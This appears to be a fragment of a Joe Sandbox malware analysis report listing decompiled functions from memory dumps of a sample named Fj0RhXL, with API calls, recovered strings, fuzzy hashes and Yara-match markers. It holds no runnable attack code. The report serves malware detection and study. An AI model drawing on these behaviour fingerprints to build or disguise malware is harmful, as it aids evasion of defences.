_free.LIBCMT ref: 6C3DFEEB
InterlockedDecrement.KERNEL32 ref: 6C3DFF27
_free.LIBCMT ref: 6C3DFF34
_free.LIBCMT ref: 6C3DFF3C

Strings

zDl, xrefs: 6C3DFF0D

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _free$DecrementInterlockedStringType___crt_memmove
String ID: zDl
API String ID: 2122248333-2720549762
Opcode ID: 3b5dbe45e515e00d00b3b980117ddf158f1375dabc186c7657ce0960d186aff1
Instruction ID: 5737610df4d969dfac9ab6b3aff46b1fdc7080246dfb96ecb7c1505436ada4ac
Opcode Fuzzy Hash: 3b5dbe45e515e00d00b3b980117ddf158f1375dabc186c7657ce0960d186aff1
Instruction Fuzzy Hash: 89514976A04215DFDB25CF24C880BE9B7B1FF4A308F1181EAE94DAB651D731AA90CF50

Function 03D8B0A0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 03D8B0CC
std::_Lockit::_Lockit.LIBCPMT ref: 03D8B0EF
std::bad_exception::bad_exception.LIBCMT ref: 03D8B170
__CxxThrowException@8.LIBCMT ref: 03D8B17E
std::_Lockit::_Lockit.LIBCPMT ref: 03D8B191
std::locale::facet::_Facet_Register.LIBCPMT ref: 03D8B1AB

Strings

bad cast, xrefs: 03D8B168

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: 9109fb48b8d772034d4b054416577b8518bfa1bcd9f3bfeb4ce1d3289c52f9ce
Instruction ID: 66715b3aa1194a92d8b898ddcac7352abd86615d452796bb17b33c72e04df21e
Opcode Fuzzy Hash: 9109fb48b8d772034d4b054416577b8518bfa1bcd9f3bfeb4ce1d3289c52f9ce
Instruction Fuzzy Hash: AF3182769102168FDB14FF54D851FAEB3B9FB04724F04025AE826AB281DB71BD08CBA1

Function 03D8D3A0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 03D8D3CC
std::_Lockit::_Lockit.LIBCPMT ref: 03D8D3EF
std::bad_exception::bad_exception.LIBCMT ref: 03D8D46F
__CxxThrowException@8.LIBCMT ref: 03D8D47D
std::_Lockit::_Lockit.LIBCPMT ref: 03D8D490
std::locale::facet::_Facet_Register.LIBCPMT ref: 03D8D4AA

Strings

bad cast, xrefs: 03D8D467

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: 503ac4b5186d0beb303c8a9c45896d6194dd7c71d5a77f166e11e9790470c302
Instruction ID: 6ce05b6fee20b8dcbead5b76975a8d7be93a88be855d56d911a985ad3c40f334
Opcode Fuzzy Hash: 503ac4b5186d0beb303c8a9c45896d6194dd7c71d5a77f166e11e9790470c302
Instruction Fuzzy Hash: 2731A2769102168FDB14FFA8D850BADB3B9EB04724F44429AD816A73C1DB30BD44CBA1

Function 6C372C59 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 6C371AD3: SetTextColor.GDI32(00000000), ref: 6C371B19

_sprintf.LIBCMT ref: 6C372CC7
_sprintf.LIBCMT ref: 6C372CEA

Part of subcall function 6C3D1F84: __output_l.LIBCMT ref: 6C3D1FDF

_sprintf.LIBCMT ref: 6C372D20

Part of subcall function 6C3D1F84: __flsbuf.LIBCMT ref: 6C3D1FFA

Strings

%s., xrefs: 6C372D1A
another., xrefs: 6C372CFD
When planets are %s, one, xrefs: 6C372CC1
Aspects are different relationships between planets., xrefs: 6C372C74

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _sprintf$ColorText__flsbuf__output_l
String ID: %s.$Aspects are different relationships between planets.$When planets are %s, one$another.
API String ID: 1481945667-3266434254
Opcode ID: 0023f396341c3312d6f1645062f708cffc8ffc2766cf20591c5fc29816669aab
Instruction ID: e934ed1bc20b8217da7bd221ea9302968a72c787d7537a76cfe6af1d3d4438c5
Opcode Fuzzy Hash: 0023f396341c3312d6f1645062f708cffc8ffc2766cf20591c5fc29816669aab
Instruction Fuzzy Hash: 302108B2900004D7CB21EB20CE45FECB3B9AF96308F41445184D0A7A44D779D98ACE67

Function 03D84130 Relevance: 12.1, APIs: 8, Instructions: 79windowCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,00000000), ref: 03D84156
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 03D84183
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 03D84199
TranslateMessage.USER32(?), ref: 03D841A4
DispatchMessageW.USER32(?), ref: 03D841AA
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 03D841B8
SetLastError.KERNEL32(000005B4), ref: 03D841E1
CloseHandle.KERNEL32(00000000), ref: 03D841F8

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Message$Peek$CloseDispatchErrorEventHandleLastMultipleObjectsTranslateWait
String ID:
API String ID: 1713936993-0
Opcode ID: b8d922bec13739eec4da162eb0491834f1c94b95933d13d3288274a82133395e
Instruction ID: 3e4a267dd6d5665619601ac6554d9d82e3f38ce5c259f01bcf4f348bd17d0f21
Opcode Fuzzy Hash: b8d922bec13739eec4da162eb0491834f1c94b95933d13d3288274a82133395e
Instruction Fuzzy Hash: 7621A776540305EBEB20EBA68C85FAA77B8EB48B10F140A19FA41E72C4D774F944CB70

Function 03D83F30 Relevance: 12.1, APIs: 8, Instructions: 79networkthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 03D83F35
SetLastError.KERNEL32(0000139F,?,74DEDFA0,03D83618), ref: 03D84023

Part of subcall function 03D82C10: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 03D82C26
Part of subcall function 03D82C10: SwitchToThread.KERNEL32 ref: 03D82C3A

send.WS2_32(?,03DB5318,00000010,00000000), ref: 03D83F97
SetEvent.KERNEL32(?), ref: 03D83FBA
InterlockedExchange.KERNEL32(?,00000000), ref: 03D83FC6
WSACloseEvent.WS2_32(?), ref: 03D83FD4
shutdown.WS2_32(?,00000001), ref: 03D83FEC
closesocket.WS2_32(?), ref: 03D83FF6

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
String ID:
API String ID: 3254528666-0
Opcode ID: 64e00a46b34bbe9dafbcd9c1a7a2ac57d9d8951689c0143c2ec12f28f12054f7
Instruction ID: da9b385ac0ab045d841fed117294bb770274d485cdc9d98c140637371ab5c123
Opcode Fuzzy Hash: 64e00a46b34bbe9dafbcd9c1a7a2ac57d9d8951689c0143c2ec12f28f12054f7
Instruction Fuzzy Hash: 61215C7A200702EBD724EF69D888B96B7B5BF44B11F140918F115CB784D7B5F465CBA0

Function 02F03F50 Relevance: 12.1, APIs: 8, Instructions: 79networkthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02F03F55
SetLastError.KERNEL32(0000139F,?,74DEDFA0,02F03638), ref: 02F04044

Part of subcall function 02F02B80: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02F02B96
Part of subcall function 02F02B80: SwitchToThread.KERNEL32 ref: 02F02BAA

send.WS2_32(?,02F17420,00000010,00000000), ref: 02F03FB6
SetEvent.KERNEL32(?), ref: 02F03FD9
InterlockedExchange.KERNEL32(?,00000000), ref: 02F03FE5
WSACloseEvent.WS2_32(?), ref: 02F03FF3
shutdown.WS2_32(?,00000001), ref: 02F0400B
closesocket.WS2_32(?), ref: 02F04015

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
String ID:
API String ID: 3254528666-0
Opcode ID: c196ce35d22241bc29093bc89ffc6dccee48f8c0a6003f667265f05111c0c652
Instruction ID: 0357803b3e0b437514495995b12fefd07e039d8da68354eab0d9a03ef81b4cdd
Opcode Fuzzy Hash: c196ce35d22241bc29093bc89ffc6dccee48f8c0a6003f667265f05111c0c652
Instruction Fuzzy Hash: 892168706407009BE3349F64D888B5BB7F9FB84B95F804D0DE292966C0C7B5E455DB90

Function 03D84030 Relevance: 12.1, APIs: 8, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,03D84008,?,?,74DEDFA0,03D83618), ref: 03D84044
ResetEvent.KERNEL32(?,?,?,74DEDFA0,03D83618), ref: 03D84057
ResetEvent.KERNEL32(?,?,?,74DEDFA0,03D83618), ref: 03D84060
ResetEvent.KERNEL32(?,?,?,74DEDFA0,03D83618), ref: 03D84069

Part of subcall function 03D81360: HeapFree.KERNEL32(?,00000000,?,?,?,03D84076,?,?,74DEDFA0,03D83618), ref: 03D813A0

Part of subcall function 03D81430: HeapFree.KERNEL32(?,00000000,?,?,?,03D84081,?,?,74DEDFA0,03D83618), ref: 03D8144D
Part of subcall function 03D81430: _free.LIBCMT ref: 03D81469

HeapDestroy.KERNEL32(?,?,?,74DEDFA0,03D83618), ref: 03D84089
HeapCreate.KERNEL32(?,?,?,?,?,74DEDFA0,03D83618), ref: 03D840A4
SetEvent.KERNEL32(?,?,?,74DEDFA0,03D83618), ref: 03D84120
LeaveCriticalSection.KERNEL32(?,?,?,74DEDFA0,03D83618), ref: 03D84127

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
String ID:
API String ID: 1219087420-0
Opcode ID: ace0844cf2624537130b7620d9539256df1e40950c469e7486e547a9c8a9cb19
Instruction ID: b63f0b62315dfe8dc17ea3fc3304619327d18d18c1b27a8f579779ea81c8898b
Opcode Fuzzy Hash: ace0844cf2624537130b7620d9539256df1e40950c469e7486e547a9c8a9cb19
Instruction Fuzzy Hash: D5314976200A06EFD708EB39C858BA6F7A8FF48310F048659E569CB250DB35B915CFE0

Function 02F04050 Relevance: 12.1, APIs: 8, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,02F04029,?,74DEDFA0,02F03638), ref: 02F04064
ResetEvent.KERNEL32(?,?,00000000,02F04029,?,74DEDFA0,02F03638), ref: 02F04077
ResetEvent.KERNEL32(?,?,00000000,02F04029,?,74DEDFA0,02F03638), ref: 02F04080
ResetEvent.KERNEL32(?,?,00000000,02F04029,?,74DEDFA0,02F03638), ref: 02F04089

Part of subcall function 02F01350: HeapFree.KERNEL32(?,00000000,?,?,?,02F04096,?,00000000,02F04029,?,74DEDFA0,02F03638), ref: 02F01390

Part of subcall function 02F01420: HeapFree.KERNEL32(?,00000000,?,?,?,02F040A1,?,00000000,02F04029,?,74DEDFA0,02F03638), ref: 02F0143D
Part of subcall function 02F01420: _free.LIBCMT ref: 02F01459

HeapDestroy.KERNEL32(?,?,00000000,02F04029,?,74DEDFA0,02F03638), ref: 02F040A9
HeapCreate.KERNEL32(?,?,?,?,00000000,02F04029,?,74DEDFA0,02F03638), ref: 02F040C4
SetEvent.KERNEL32(?,?,00000000,02F04029,?,74DEDFA0,02F03638), ref: 02F04140
LeaveCriticalSection.KERNEL32(?,?,00000000,02F04029,?,74DEDFA0,02F03638), ref: 02F04147

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
String ID:
API String ID: 1219087420-0
Opcode ID: 4c98dd88af2f3f18e0fec7dcd95f0bd054de55248d6305c1438ee590e4b4c540
Instruction ID: e9c848597f8f7d243f798a117bd0e0c705f12173cafdbcd729af0885dfe1073c
Opcode Fuzzy Hash: 4c98dd88af2f3f18e0fec7dcd95f0bd054de55248d6305c1438ee590e4b4c540
Instruction Fuzzy Hash: EC314671A00A06AFD705DB78CC88B96F7A9FF48350F408659E62987290CB35B865DFD0

Function 03C062FF Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 351COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 03C06509
_memset.LIBCMT ref: 03C0653E

Part of subcall function 03C0A591: _malloc.LIBCMT ref: 03C0A5AB

Strings

gfff, xrefs: 03C063C7
gfff, xrefs: 03C0639F
(, xrefs: 03C064CD
6, xrefs: 03C064F0

Memory Dump Source

Source File: 00000006.00000002.3622789502.0000000003BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3bf0000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: _memset$_malloc
String ID: ($6$gfff$gfff
API String ID: 3506388080-713438465
Opcode ID: bb8b999758f263b947e8caf31c84ff1df53292a2da770c4adba7dbdd92178812
Instruction ID: 9ca3d17a97a223f5bc2e8fea2459ac66332379c7d9c8541593e59b214c368451
Opcode Fuzzy Hash: bb8b999758f263b947e8caf31c84ff1df53292a2da770c4adba7dbdd92178812
Instruction Fuzzy Hash: 50D1AAB1E00318AFDB14EFE9EC84A9EBBB9FF48300F014129E505EB291D774A915CB91

Function 02F02140 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 303COMMON

Download Yara Rule

APIs

Part of subcall function 02F01610: __vswprintf.LIBCMT ref: 02F01646

_malloc.LIBCMT ref: 02F02330

Part of subcall function 02F06F93: __FF_MSGBANNER.LIBCMT ref: 02F06FAC
Part of subcall function 02F06F93: __NMSG_WRITE.LIBCMT ref: 02F06FB3
Part of subcall function 02F06F93: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270), ref: 02F06FD8

Strings

input ack: sn=%lu rtt=%ld rto=%ld, xrefs: 02F022AC
[RI] %d bytes, xrefs: 02F0216F
input wins: %lu, xrefs: 02F023CF
input probe, xrefs: 02F023A1
input psh: sn=%lu ts=%lu, xrefs: 02F022DF

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: AllocateHeap__vswprintf_malloc
String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
API String ID: 3723585974-868042568
Opcode ID: 57986cf73ae48de04804c7b3b56d5387a1ced4819c38fa379e6cb27cbe8ca76a
Instruction ID: 4fe56b1faf3609546be6d9817c0c67b61a061684d6e18c435db06b26af75b4c9
Opcode Fuzzy Hash: 57986cf73ae48de04804c7b3b56d5387a1ced4819c38fa379e6cb27cbe8ca76a
Instruction Fuzzy Hash: E7B1C575E002058FDF18CF68D9C46AA77A6BF48394F0845AEEE099B386D731D941DFA0

Function 03D81840 Relevance: 10.7, APIs: 7, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 03D81888
_free.LIBCMT ref: 03D818C6
_free.LIBCMT ref: 03D81905
_free.LIBCMT ref: 03D81945
_free.LIBCMT ref: 03D8196D
_free.LIBCMT ref: 03D81991
_free.LIBCMT ref: 03D819C9

Part of subcall function 03D9AB04: RtlFreeHeap.NTDLL(00000000,00000000,?,03DA2A36,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE), ref: 03D9AB1A
Part of subcall function 03D9AB04: GetLastError.KERNEL32(00000000,?,03DA2A36,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE,00000000), ref: 03D9AB2C

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 28e569f733c864184a1c9ae4c6f7698520a63bd561cc2920972b998a783792aa
Instruction ID: 71423acc53cd51cc4fdf54615d2afc7cf125375ff3e69936a950b91d639ec7cd
Opcode Fuzzy Hash: 28e569f733c864184a1c9ae4c6f7698520a63bd561cc2920972b998a783792aa
Instruction Fuzzy Hash: 32513DB6A10215DFC714FF58C480969BBB6FF88218B1A80AEC51A5F311C732BD4BCB91

Function 02F01830 Relevance: 10.7, APIs: 7, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02F01878
_free.LIBCMT ref: 02F018B6
_free.LIBCMT ref: 02F018F5
_free.LIBCMT ref: 02F01935
_free.LIBCMT ref: 02F0195D
_free.LIBCMT ref: 02F01981
_free.LIBCMT ref: 02F019B9

Part of subcall function 02F06F59: RtlFreeHeap.NTDLL(00000000,00000000,?,02F099CF,00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270), ref: 02F06F6F
Part of subcall function 02F06F59: GetLastError.KERNEL32(00000000,?,02F099CF,00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270,00000000), ref: 02F06F81

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b35a8292ee0bcd415e47a57dbbd02479a6c3d77d3933a9ad768a64f961dd7da2
Instruction ID: 28a3d44331cdbad2542c12debb167983aceea9e4b945e40b80798b88ad8afa65
Opcode Fuzzy Hash: b35a8292ee0bcd415e47a57dbbd02479a6c3d77d3933a9ad768a64f961dd7da2
Instruction Fuzzy Hash: 24516D72E00115CFD714DF58C4D0956BBE6BF8939872A80ADC60E9B351C732AD12DF91

Function 03D83840 Relevance: 10.6, APIs: 7, Instructions: 149threadnetworktimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 03D83853
SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 03D83894
WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 03D83901
GetCurrentThreadId.KERNEL32 ref: 03D8392C
GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 03D839C4
SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 03D839F2
WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 03D83A09

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
String ID:
API String ID: 3058130114-0
Opcode ID: f0221bdaf25d10c8660ccd6b98ff6a2aca566ede117902669740cc40f41d7cbe
Instruction ID: 523d93129f33ef756a9c381caec84c2e7cc563aafe6c92e0d2f55316d08ec825
Opcode Fuzzy Hash: f0221bdaf25d10c8660ccd6b98ff6a2aca566ede117902669740cc40f41d7cbe
Instruction Fuzzy Hash: BF517CBDA00701DBD724FF68C984BAAB7A8EF44B14F144919E99ADB280EB70F541CB51

Function 02F03860 Relevance: 10.6, APIs: 7, Instructions: 149threadnetworktimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02F03873
SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 02F038B4
WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 02F03921
GetCurrentThreadId.KERNEL32 ref: 02F0394C
GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 02F039E4
SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 02F03A12
WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 02F03A29

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
String ID:
API String ID: 3058130114-0
Opcode ID: f39586be08a3bb85d3bd4116a31f335cfd26fcd7cefb7c2935fd1c8b128ba1bd
Instruction ID: f3fd1f7acbf89d557dc7def988d009b87c2b6a5150c5489485d9523fc9e27b0e
Opcode Fuzzy Hash: f39586be08a3bb85d3bd4116a31f335cfd26fcd7cefb7c2935fd1c8b128ba1bd
Instruction Fuzzy Hash: 6C518970E007059BDB209F64CDD4BAAB7E6BB44794F50485AEA9ADB2C0DB30F840DB51

Function 03D93690 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 03D936B9

Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99ACC
Part of subcall function 03D99AB7: __CxxThrowException@8.LIBCMT ref: 03D99AE1
Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99AF2

_memmove.LIBCMT ref: 03D93712
_memmove.LIBCMT ref: 03D9371F
_memmove.LIBCMT ref: 03D93731
_memmove.LIBCMT ref: 03D93772

Strings

vector<T> too long, xrefs: 03D936B4

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 4034224661-3788999226
Opcode ID: 34ef468bcf97d56ae04d17728a57798c68f0f7237951f085a20b859cb0cd334a
Instruction ID: 280ea17f27a9e58b508a3079a06c01471a7d8221f8a2feb4c9066730d00c0017
Opcode Fuzzy Hash: 34ef468bcf97d56ae04d17728a57798c68f0f7237951f085a20b859cb0cd334a
Instruction Fuzzy Hash: E73173BA7003059FDF18DE7DCC9486F77EAEBC4614B14862EE85A87744EE35E81187A0

Function 6C3AB80B Relevance: 10.6, APIs: 7, Instructions: 113windowCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,000004D7,00000000), ref: 6C3AB843
CheckDlgButton.USER32(?,000004D7,00000001), ref: 6C3AB860
IsDlgButtonChecked.USER32(?,000004D6), ref: 6C3AB88F
CheckMenuItem.USER32(00009D14,00000008), ref: 6C3AB8D4
CheckMenuItem.USER32(00009D14,00000000), ref: 6C3AB907
EndDialog.USER32(?,00000001), ref: 6C3AB926
CheckDlgButton.USER32(?,000004D7,000004D7), ref: 6C3AB953

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
